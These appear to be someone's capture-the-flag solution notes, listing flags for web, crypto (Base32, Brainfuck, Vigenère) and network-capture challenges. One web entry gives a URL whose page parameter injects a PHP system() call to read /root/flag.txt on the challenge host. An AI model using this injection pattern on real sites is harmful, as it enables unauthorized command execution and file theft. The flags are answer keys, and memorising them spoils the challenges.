1) Found in JS file
flag: Sl7{SeCRET213#_T}



3) as33rt1


Link: docker.h4x0rbox.com:2080/?page=.%27.system("cat%20/root/flag.txt;").%27
https://github.com/bl4de/ctf/blob/master/2016/CSAW_CTF_2016/mfw/mfw_web125.md


4)



Crypto:
1) Ground:ORUGS4ZANFZSA2DPO4QHS33VEBSWC4TOMVSCAU2MG55UO4RQKVXEIX3UGBPUKNDSORUH2IBA
Base32: SL7{Gr0UnD_t0_E4rth}  



2) Fuc
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++++.+.-.+.-..+..-----------------.++++++++++++++++.+..-.+..-..----------------.++++++++++++++++..+..-.+...-----------------.++++++++++++++++.+....-.+..-----------------.++++++++++++++++.+.-....+.-.----------------.++++++++++++++++.+...-..+.-.----------------.++++++++++++++++.+..-....+.-----------------.++++++++++++++++.+..-.+.-..+.-----------------.++++++++++++++++.+..-.+...-.----------------.++++++++++++++++.+.-.+.-.+...-----------------.++++++++++++++++.+.-..+.-..+.-----------------.++++++++++++++++.+...-.+.-..----------------.++++++++++++++++.+..-.+.-...----------------.++++++++++++++++.+.-....+.-.----------------.++++++++++++++++.+..-.+.-..+.-----------------.++++++++++++++++.+..-.+...-.----------------.++++++++++++++++.+..-....+.-----------------.++++++++++++++++.+...-..+.-.----------------.++++++++++++++++.+.-.+..-..+.-----------------.++++++++++++++++.+.....-.+.
Brainfuck
Into binary
01010011 01101100 00110111 01111011 01000010 01110010 01100001 01101001 01101110 01010111 01001001 01110100 01101000 01000010 01101001 01101110 01100001 01110010 01011001 01111101
into text
Sl7{BrainWIthBinarY}


3) Vcode
Xw7{AXj_J0U-J0sP}

Into Vignere Decode and key is flag

Sl7{ARe_Y0U-D0nE}


4)




Network:

Opening pcap file with wireshark, it was interaction with an ftp server
Sl7{FtP-NetwOrK_DuMB}
